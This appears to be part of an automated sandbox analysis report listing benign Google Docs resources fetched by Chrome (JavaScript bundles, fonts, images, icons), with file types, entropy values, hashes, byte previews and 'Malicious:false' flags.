                                                                                                                                                                                                                                        Preview:wOF2.......X...................................... ...0....`?STAT@........X..#..h..6.$..L. ..v.....[....1v.n.,...u.0..-........a3......7.B.....].............-Y.._.>....""].t.kuc.C..nR.U.......9%#D..G..%.d...f...U..f.C=.l.5B...1ALPh2.2...D%#i..A..o.v..d....w.f.6K.tf. U...."r...d#.UD.....5Y.....;.D~9.up.......i.[.O.).t...0..7..w..%..T......;.9CB....>..|JF.....~..G..~..........+}...]W..s..h..._.%;/TK....b~x.....l.l.YH.[.AL..*h8AL\Ry.t.Z...*c..-aBf..,...Y...K@.7..R...Gi..O.........ok.16..(q.......|,"m..........0.)........Q..V.o........<..r..SK........B(bR(.GJ....*.uJ%......._u.7....X`..#.s..Y..k..;.$A.i.r.%...d,.|...}..D2j!h..I..&...c...Y.d.z..."....x)e$...u...@&..*.:..g.a<.z..'y....l..qRv......(...[N.0..g.. ..f..O...J..s},.s^U.-.3,.2.yO{.l....[J....G.n...LR....@....$}......f.GF.}/..^..p)/....?$...1.?6....!&...;~@..r'Y...d.r.A.B..f...K...../diJ_.aw.%.......&....a0.f..m..P#.2%....c.."....{.._e...mT....!0.c....b....>...)`.[.C.a.m4.x8...7..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1400)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):22426
                                                                                                                                                                                                                                        Entropy (8bit):5.430162252927682
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:BzI83aaoRjuyMRPcmr6Y23yHWp0SGozyhUm5kUWCB4JM:ZdNbqDY23ZJGozyhFkw42
                                                                                                                                                                                                                                        MD5:01CB502F8BAB0ED7FB47546DD0DD0F48
                                                                                                                                                                                                                                        SHA1:1203C218DD21085E59797CF06E2D812F86116557
                                                                                                                                                                                                                                        SHA-256:4CB900BCB6F7018B7CCAFD0570D12080798275291C0F1DF73DD8EB80E0C9F5D9
                                                                                                                                                                                                                                        SHA-512:F7C6A8A0B7D64748B727AC0704C4CAB45A302A65B562658C2C59511D195B57264BABC554B1C3F874F416F199032B7D2F8DEF19749492812534D672EF08263E7E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://docs.google.com/static/document/client/js/3911495566-client_js_prod_peoplehovercard.js
                                                                                                                                                                                                                                        Preview:mK(m6a);.var yrw="C__HC_94253229",zrw="I__HC_94253229",Arw="No email data found in handlerInput for Events.Calendar: ",Brw="__HM_173584019",Crw="boqSocialpeoplehovercardV2HovercardAnimating",Drw="buganizer-system+",Erw="docsHeaderConfig",Frw="forceHide",Grw="hideTriggeredByMouse",Hrw="hovercardAlign",Irw="hovercardHoverTriggerDisabled",Jrw="hovercardOwnerId",Krw="this.el_ is falsy",Lrw="yaqs-carrier-pigeon+";WKe.prototype.UTa=X(948,gm(Mg));ZKe.prototype.UTa=X(947,function(a){ZKe.Uc.UTa.call(this,a);bLe(this)});.function Mrw(a){this.Fa=Q(a)}H(Mrw,S);function Nrw(a){this.Fa=Q(a)}H(Nrw,S);D=Nrw.prototype;D.getMetadata=function(){return R(this,Mrw,1)};D.getValue=function(){return qq(this,2)};D.setValue=function(a){return Qq(this,2,a)};D.getType=function(){return qq(this,3)};D.Ac=function(a){return Qq(this,3,a)};function Orw(a){this.Fa=Q(a)}H(Orw,S);Orw.prototype.getEmail=function(){return R(this,Nrw,1)};Orw.prototype.yu=function(){return Vp(this,Nrw,1)};function Prw(a){this.Fa=Q(a)}H(Prw,S
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27134
                                                                                                                                                                                                                                        Entropy (8bit):4.949493419733994
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:G5Cj0WN9Oe/bMZ0oEQSERgPtuLCnulPmo8MADYyY/AXVRdB6j0T5D7ZVQR:GkOT0onfgPtfuwMFyY/ZC7G
                                                                                                                                                                                                                                        MD5:3EFE1C5EB7CC2EF3419BF71B650479B5
                                                                                                                                                                                                                                        SHA1:B7E11B6A8304285BDB9528B3E5707FDCC4441A70
                                                                                                                                                                                                                                        SHA-256:7D24D331406734568514DFE0510CB86244FBD402809150576A94B8F93ECDBF43
                                                                                                                                                                                                                                        SHA-512:19102F6AA0344C320D2D0C42C479E88B9119915DEF3E1BED4AFDEC7154C581DC0852E9BDA29E6DBC6DC40EB32D71F5328A0C22CED21ACA1E8C502F4F450359E7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" x="0" y="0" width="29px" height="1049px" viewBox="0 0 29 1049" preserveAspectRatio="none"><g transform="translate(0,308)"><rect fill="#4387FD" fill-opacity="0" width="21" height="21"/>.<polygon fill="#999999" points="15.5,7.414 14.085,6 10.5,9.586 6.914,6 5.5,7.414 9.085,11 5.5,14.586 6.914,16 10.5,12.414 14.085,16 15.5,14.586 11.914,11 "/>.</g><g transform="translate(0,281)"><g xmlns:sketch="http://www.bohemiancoding.com/sketch/ns" id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd" sketch:type="MSPage">. <g id="Artboard-1" sketch:type="MSArtboardGroup">. <g id="Oval-26-+-ic_link_24px-3" sketch:type="MSLayerGroup">. <circle id="Oval-26" fill="#558B2F" sketch:type="MSShapeGroup" cx="12" cy="12" r="12
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1364)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):7862
                                                                                                                                                                                                                                        Entropy (8bit):5.525314332975389
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:YeDrChOOQM0AUiO/OHHht+d2RIiQGhXd1D:YeShnQM5BoyPbp
                                                                                                                                                                                                                                        MD5:C77E0E372E08E4012FF75D3FD96604D0
                                                                                                                                                                                                                                        SHA1:B1342785D463C4746AA665ADBD060F8765ADE734
                                                                                                                                                                                                                                        SHA-256:58683E31C036B648735232DF59AF3E4694E44B10B71A642BCC64FD407050A65C
                                                                                                                                                                                                                                        SHA-512:0AC151BE739D1EBE99810C995945E78E26F688853517D67F18DED75B90DA2C184F07961D4EF582C69DA94BF760CB35166BFBE3E342C7EC4E6B34787A047F5002
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://docs.google.com/static/document/client/js/300033082-client_js_prod_kix_approvals.js
                                                                                                                                                                                                                                        Preview:mK(H1a);.var LQt="docs-approvals-toast-reload",MQt="docs-approvals-toast-unlock",NQt="unlocked";function OQt(a){this.Fa=Q(a)}H(OQt,S);D=OQt.prototype;D.getId=function(){return qq(this,1)};D.hd=function(a){return Qq(this,1,a)};D.NB=function(){return qq(this,5)};D.getStatus=function(){return rq(this,7)};D.Hn=function(){return $q(this,7)};D.getType=function(){return rq(this,13)};D.Ac=function(a){return Rq(this,13,a)};function PQt(a){this.D=a}function QQt(a,c){this.F=a;this.D=c}.function RQt(a){if(a=vul(a)){var c={};return c[Nil]=a,c}return{}}var SQt={inProgress:1,approved:2,declined:4,cancelled:3,statusUnspecified:0,artifactsPending:5,failed:6},TQt={decisionUnspecified:0,noDecision:1,approved:2,declined:3},UQt={typeUnspecified:0,contentReview:1,eSignature:2,alignment:3},VQt={failureReasonUnspecified:0,artifactGenerationFailed:1};.function WQt(a){a=Zo(a);var c=SQt[a.status];if(c===void 0)throw Error("u3");var e=new yfh;Jq(e,3,a.capabilities!==void 0&&a.capabilities.canReview);for(var f=[],
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):71956
                                                                                                                                                                                                                                        Entropy (8bit):7.989217533805544
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:HVsk7qR4g4Q8WZ/3FY3G1jIKxmyPoQjN+F2aAibFVv50g6:1sR4WvY3G1j9XdjQJVFJg
                                                                                                                                                                                                                                        MD5:DECB2F52FD4BE6C3D27BBF394666E7C6
                                                                                                                                                                                                                                        SHA1:37AD1AEEDFEEE31808AEF1BFEAE1C0D19FB7F719
                                                                                                                                                                                                                                        SHA-256:0917337FED065EB359DFC5329B6DD16A13CF737DE09F4EA93831A82A848A4A2F
                                                                                                                                                                                                                                        SHA-512:C92B6C200E3F94255B9DC0C2FFCCC7B22D2724E132F77B39309FDC9BDE5C8631E07C44EF848650FA953DB9304C062D24F483D74575F583C5F1A9BF61ECB31958
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx......... ...9>!.)..).......`+,.a...V.%.q..z`.@'2.%.-.~3.9133..91333c..$.d.3.-.LW.....[..6.._>......t.VU......("B..JD...'..&@.E.7........UA...#bN.H........LNO.o.i...'.P...5@..V.C4.,cN=...:..Y..J........v;N.X....@q\z...w.*.E1iui.+@.....\f..&,.(..1...ZN..I5.jj..=...Eh/.Q..\...QD..eM-.y.1._.W... .q..8.r&.....Y.......@.U.d......3q.......j.Ggye0I....#.....,`N...E2...N...0f..q.\}.....]...G..........7>..N7^rq.g.y..=b.0Ab...A./.?aX.......U!....XU@.AP......D..i./..(*4...Vc.j...y........#X.}2..`..#6.i.(U.y..Ed.AD(.......X..%.....3..7..s`if.&.^...L.].r.N_D./.s..F..z.u%..-\....'J.....F.0. ...W<[..Ia..$..*.3UX....?j./..#2.MZ;....%...$..]@8...n..)S...E..}.bK].$....8.EP..z........[\...6.]...E......8E......*....AR.^...o.;...8..#..._...%V...f..W.........^....... %0..|..w...'n.......{|.[.!.eI..(0.....U.x......6..*..%....&...(.|PT..o...j`..|../..wnBI.j,x.1.a5.)U.:<z7....}.4..S..TV../.....h....#.'..1oL..4......kc.-.([..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10888
                                                                                                                                                                                                                                        Entropy (8bit):7.865297868743237
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:Ts1kQBx0a92MSzc3jyYTq58esT14t7gXDZXn45WDxGY1u9G:A1802MZbW6esJ4tgZXn4Mbu9G
                                                                                                                                                                                                                                        MD5:AE6E5598E1C5D6AC511CDA6CDC03CDDF
                                                                                                                                                                                                                                        SHA1:A485B00FDD94E7CF6B6C200861049AF8827AD471
                                                                                                                                                                                                                                        SHA-256:074E51B8A8FB8E278541CA6590F3757135B3A727F79D5F78CA24D631103C9AB6
                                                                                                                                                                                                                                        SHA-512:30A4E9E92BFB381F24AEC31BEFBD9EE8E2C67EE1BD01446E646C60F462C5B3BBC9137DA2231AAFA143CB4D5B37E8667483FC5FAB3D3B0F471E10997777FE2B3A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..*OIDATx.....0.E.J..4+.....q. |......`... X... X.`....`... X......`... X... X.`....`... X......`... X......`... X... X.`...@G....@.....,..v...1.`.....(8..{-3.e......aff.....033s.p.0G...$....`K......u..{....s.....Em`!W.;,.>!...>@.0s..i..|..r..K....q]..&..&...2...uD.z.U6,.[c.......EV^^.P(.@.TjA.K..G.>..k...........1...b.-...C6,.A.y.dE<.H......Y.5...:.....S.6..c'~a..|..._\..z...I6u....................X....L...l..Lvs.vL.L..o......s....G...R..}....6UPP............#.._d.....`.qv<I.HF..D..+...&R.JF;V.4.... ...?..B2.$S.....N..."L.....L*....d.JHH.....nc..6..............--...*.{##.....gggKKK."^.}..dj.'.hR.1l.$}..p_.x....6.8..(N..>..,....q..*!&..r.l..c>.. ..k.A.....n...3g.Tjjj^^..sss...SSS....566..j.J...0.CH..5....KOp0.z.4.....N..U...&....u..9.N.........$..u4GK......tU..?..=.4.."n-c.O...........\\\...5......T...4......?.<33s~~..877..X}}.....2...I......9.vT..<....q.bC..(.P..V.V8..O ....EP..g..hr .d..\.o.-..z...a.\....z0...]
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24291
                                                                                                                                                                                                                                        Entropy (8bit):2.9545368105511347
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:TDtLe7tZYTn7CNOAMUFuIuV///b//3///k//u//+///3q///NtLNhesjfXKzgE:0gfCN9F0AG7eIazT
                                                                                                                                                                                                                                        MD5:05F2F2059412502B0CF2140369A01612
                                                                                                                                                                                                                                        SHA1:ED998506B18948CBD20A4C7103199A10CF723922
                                                                                                                                                                                                                                        SHA-256:3D45292EEF3C671FCAFB8CE679C08FCCED09A3835E46F9ED51C7FA9AF2E0E11F
                                                                                                                                                                                                                                        SHA-512:E337A5A29179ACD05347D125AF5DA24813238E94736F403A18131B0C97E32A17C9F5B667173BA8DE2297B37067D0FDCA306A6CF4EAE2892923661F42994C0982
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:............ .h...F... .... .........@@.... .(B..V......... .e...~W..(....... ..... ..........................B`.B..B..B..B..B..B..B..B..B..B..B..B..B..B..B`.B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..............................B..B..B..B..B..B..B..B..B..............................B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..........................................B..B..B..B..B..B..........................................B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..........................................B..B..B..B..B..B..........................................B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1437)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):117390
                                                                                                                                                                                                                                        Entropy (8bit):5.490758436358278
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:jMyvhJyj1UjPEWKcxUww3wM0W/N79419n5QJEx:jMyfyj1cPPC70W/Na5QJEx
                                                                                                                                                                                                                                        MD5:B52266FAD5115039E3806FF8DCD71F86
                                                                                                                                                                                                                                        SHA1:8007278E322C8EA9F3CB5B62008E3E3599E9F659
                                                                                                                                                                                                                                        SHA-256:E390D05D78F6E51B03F7C3D1D0C3B7C3E79B3D53C4F83685CFAD83D2E863456E
                                                                                                                                                                                                                                        SHA-512:58293A89F48926A7059F6C91AA79EBD941072D3BC31AA571342ABA76F007981750620F960CCB59E9E3C828FC8E1748B500E3138381D82EF8A171AD7C60F5C5FC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var aa,ea,la,oa,ya,Ba,Ca;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.la=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.na=la(this);oa=function(a,b){if(b)a:{var c=_.na;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.oa("Symbol",function(a){if(a)return a;var b
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):62
                                                                                                                                                                                                                                        Entropy (8bit):4.815015818724121
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:cJcMLGFnvMbdZXCn:4cNId0
                                                                                                                                                                                                                                        MD5:9616FBAE5F00ADA3497DA6870596038C
                                                                                                                                                                                                                                        SHA1:E3B7100995CC4AD6E0560121896F384513A97BD8
                                                                                                                                                                                                                                        SHA-256:A5B603361206847FD11DEE4FCA7E26EFB693BD714B2B15EE3A6E456D29242057
                                                                                                                                                                                                                                        SHA-512:73DED1BA21B3B9D9D38B7647C01EF5ACCA7283310D379429C698E52E0634B8A6CDA1C87D7BACB3D6392562E89AD82105842E097B916EA216CDACBEBF0D914746
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:gapi.loaded_3(function(_){var window=this;.});.// Google Inc..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12326)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):326658
                                                                                                                                                                                                                                        Entropy (8bit):4.603902938828657
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:a3eShJKsbvlHf9iugSc0UtUPGh9ejoN14hOvg/2tUcUJImJDedrJV:M/2kimIdrJV
                                                                                                                                                                                                                                        MD5:4D5FF1F9E34D2EA32AF617C70CC65E85
                                                                                                                                                                                                                                        SHA1:662BCE42E5C1C5A8A8BC27AF424626DEC96C8C9E
                                                                                                                                                                                                                                        SHA-256:C42CDFE647099D197915107F186DC0B593393C7D63C9618C5D2C8E2314B4B054
                                                                                                                                                                                                                                        SHA-512:D63FFC84F79EA16F6F7D9511F338B8EB0320E3084775F49F2E4371579446A87A7D8C142E7A3D78279FF72E3A8C1AF35242CD413FB99F804733FC2D5CDBC0E2AD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:mK(GUa);.function jKu(a){ckl(a);a=a.Fa;var c=a[Ep]|0;a.length=c&512?1:0;Fp(a,c&-257);uqb(a)}function kKu(a){this.Fa=Q(a)}H(kKu,S);kKu.prototype.J4=function(){return xq(this,1)};function lKu(a){this.Fa=Q(a)}H(lKu,S);function mKu(a){this.Fa=Q(a)}H(mKu,S);function nKu(a){this.Fa=Q(a)}H(nKu,S);var oKu=nr(nKu);function pKu(a){this.Fa=Q(a)}H(pKu,S);var qKu=nr(pKu),rKu=nr(cqk);function sKu(a){this.Fa=Q(a)}H(sKu,S);var tKu=nr(sKu);function uKu(a){this.Fa=Q(a)}H(uKu,S);var vKu=nr(uKu);.function wKu(a,c){return a.filter(c?function(e){return zq(e,2)===c}:B(!0)).flatMap(function(e){return iq(e,kKu,1,$p()).map(function(f){return f.J4()})})}var xKu=/[#*0-9]\uFE0F?\u20E3|[\xA9\xAE\u203C\u2049\u2122\u2139\u2194-\u2199\u21A9\u21AA\u231A\u231B\u2328\u23CF\u23ED-\u23EF\u23F1\u23F2\u23F8-\u23FA\u24C2\u25AA\u25AB\u25B6\u25C0\u25FB\u25FC\u25FE\u2600-\u2604\u260E\u2611\u2614\u2615\u2618\u2620\u2622\u2623\u2626\u262A\u262E\u262F\u2638-\u263A\u2640\u2642\u2648-\u2653\u265F\u2660\u2663\u2665\u2666\u2668\u267B\u
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 64656, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):64656
                                                                                                                                                                                                                                        Entropy (8bit):7.996287850457842
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:22fMmkOQ8l40fU4rMYDtbM/lv4ri2YdBRlJeZWmSbATNfL0lg3y:22Gof4YDBM/lzh1lsbScxfLkgC
                                                                                                                                                                                                                                        MD5:28E2B282CBDDE4FBEF925AA25DF6FEA3
                                                                                                                                                                                                                                        SHA1:764C6B373670D221C28CD5DA0584FCEB1C444905
                                                                                                                                                                                                                                        SHA-256:B1DE6EAC3059CA778E6D2367182C7F11EDC81E09971E56F788DB308A674EA7EC
                                                                                                                                                                                                                                        SHA-512:54D8A320ADDC0205D3A57D768B80A06B7AD09D47E79DD4248B068E20D0A65F00C5E96871FB6AC09B9CE2B8D8AA77656384FB11F58902A42D55A0DA804F0CE6DA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/amaticsc/v26/TUZ3zwprpvBS1izr_vOMscG6fA.woff2
                                                                                                                                                                                                                                        Preview:wOF2..............60...*..........................8.......`..d..*..m.....\..1.....6.$..X. ..`.....<[W.q.....D.nC -.u.Z..07.A._.N^.....q..nU.$`$......'.1.n..@E.J*........0............^.`...d..+.f....;[.;..'2.[3z<...|....^i.=...X[..6*Q.m.L..7zO....XH>....i..m8........x.B.B.(.?.#x'/v...>.l..J...J.a..i..'....#.$.{.tIV.[w..q.&..37{.I.#L&....\..9....H....f.3F.zq2M+F..5..............yPI'...].%..'^.....N.7q.L...!....6`DM.1.KbLF.Pj....'(b.R...Q....b`....-.=....<..{_.......@0(!..EJ"B.`+A..5(.......8.=....r\...\..Xy..b..5.....z'...^.8..l..Ny.....3.....H.0...]~.!...@F..N.B.+Y.zP|..gg..,.(.^.....x...Z5g.T"7x.:.a..BU.....2=.....S#L..mYQi.k./.77>m....F...].J..o.Q.F..!.1...3f.1c..3~C.1cF.1c..3cF..v.. .$..........KrI.._.K...JO!.z.RD......."...!B......... X..u.p.$...-.........L:L.i.-K!~...|)..2v/......!.i...".mFR...?.YJM..l....Y.6..G...........2q.t..!dh..Uk`.0t....#.j..O......!&.Ql..9J....y...[qQm..V;_.j..8.a....m;...i..L.c7.`......?...^d..i.1.!..8...#.....
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):22034
                                                                                                                                                                                                                                        Entropy (8bit):7.952340488936008
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:RpjgKo2CbdgGwUrdMngGDPTR5eo8kuDLNngve61Uc0VKFFmC3k:RWKtChKe23PTR5eoigveyUcKnC0
                                                                                                                                                                                                                                        MD5:888BB74555006DCBA050F049257484B3
                                                                                                                                                                                                                                        SHA1:BA0C6D15F8FCB24DAD4B2A061D55A463BB51CC52
                                                                                                                                                                                                                                        SHA-256:527731A600B270529B00047AB0E18CDF8ACD02454CDD90CEDA066E0B1DDCE067
                                                                                                                                                                                                                                        SHA-512:4DDB321A7E07F9CE84FC533A873F13DED71009C6226A883D1D72366163A004172E14B3AD7A8C0B6D1D903D441073E68BA805D5995D47D946F685AC58B48C88AA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1a0MxgW7itIEPjRktBCBvRuNPWZB4PdEqLmzGaXZPYqk_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..U.IDATx...1.....0.G..2.0..0X.E...... ,.a........a...@X..... ,@X..... ,.a............@X..... ,.a..... ,.a............@X..... ,.a...... ,.a............@X..... ,.a........a...@X..... ,@X..\...n%......1....33333.......cff......Ndizf..=....47......8.../,X~xv...W..7o....f..2c...CG..?..5Y.w.^}b.W...".>)..:s...G.KN.?.....]..S.&...:...G...n...?!..t.2....5a..u..].&.........$.?QZ.JbU..wH...NjZ...;.U.p.M-......=}...E`a7$.u....y....]/w.=..[n.....G......;.?...".Vl8+....[1>.}.?..k.x.6\H~..p....5e.Zq........-;...%$.!..x.).*.,../M.@.L..4H...7Q.V.SN^..,.....U.F.q.6..z~.G.~Y.^kI..4....6..".._..O...8P...)M+.j.7.Y.. ......g.V........n...I ....E`...&..G?O.s.Q.Tu.9.U.. ....Cg.3......Y.G..Y.[...A`.X....g..w..g.....?.$[h.B]......BS$J....j..Yt.:LRAxi%..,U.X...!.......s. ..{]RG.."..."..-= ..q.K..D.>.E.T.d1.,.k.y.X03p...W.9.o.=.L.i.X.V..}......)...\....n.e...p..K?p..Ep.I.)C...B8..O.>.-7.z..8V.f].=...M.:u....k.e...Q.n.... .R.X.<.L..,.^..:
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 37828, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):37828
                                                                                                                                                                                                                                        Entropy (8bit):7.994199601770781
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:TLreREud92B1C5buEpioxWe6O1ESHFnLQkbknuF1dcjI5djeBX:Tu68248oxWe6O19H1zwnubdk
                                                                                                                                                                                                                                        MD5:50B140B1E97D859D6D0603414F4298EE
                                                                                                                                                                                                                                        SHA1:500E4872EE1BA9CF89F1BA626D64987B0F9AB5C9
                                                                                                                                                                                                                                        SHA-256:FDC9964050BFA24C27A3C76C6791B3674292A5F352CBC83D7A4DC49595BC3FB1
                                                                                                                                                                                                                                        SHA-512:55EF84E956A7943E3FC61A8A349E64E9F35B7DFC63402AB52B995F43A7CD4B1D2ACD300126DCDD610D0B106AF426848F998CCF154F712034422D242D6AD9130D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
                                                                                                                                                                                                                                        Preview:wOF2..............~....C..........................^...V..D?HVAR.'?MVARF.`?STAT.8'2..L+..|.../~.....$.u....0..x.6.$.... .....e..([.lq...{En.0..I..h...[....-y2..)..@(.*....T...K....$E.U.uA.b...AO..CU"O.W.]7..'............a.@...kF9.3.....xV..7.tg4#Ol.x}o.M...w...Q..))..-.i.R..&.P.......N..[F.C...x..9.|.;......d$..L.<......=.M.S..HlLHr.#+.S}..+..C....D..'^..~.}..TeT`%.......^..$....0....1 A.. ...bm..]T.E...n;._Qqm....RK.....=....\{.h.O&.D$.U......YS U..i...@.:W........p..pS....-.w.EQwp@.....},.G.@,....0IAV....P...~..0.....8..f...5..Os...5..P...n&wS+.P:.7.e.$t~.s_...z..3..Z.....}.A..2Uj...@{.:Ln.}.t.....i.>Kl.."RQ..h.;.........%...eY.E?...W..00(.z.ml.J.TPP...........G...6.=.Z%...\T....W..q...9D.m...)6..1..\.....v7......U..jr..-i.c.3iL..,\..!...b.d.A...d..C.....Ra:Q.!.M,.e.S*MC$$M.w..c.151=.m..o@.G$.X..P'..|.E."..Z.k......i"......S8..@.d.....2..t..........{..X.]SN..$....K....j5..e..,.%...T..)+.";@.v...9.R..]......,...W.iY...f..r...Q.FY.P.#...X...S
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 1528, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):1528
                                                                                                                                                                                                                                        Entropy (8bit):7.7753709629209045
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:5agnVyeL5S2yekPsk9PfKFG8XUxRD5HLRRD14X9Yumi5+MoVOwhdv2jN:5agh5fBkUc8yRDPtudw/94N
                                                                                                                                                                                                                                        MD5:EB7377208715318B001D920F049E318B
                                                                                                                                                                                                                                        SHA1:9E428185FC78B5F18B11D1B29353433939B08B5B
                                                                                                                                                                                                                                        SHA-256:10505DF86B3638BE7B5707A542C0C7C80ED856F14E037BB1C64BFAF712B0AB75
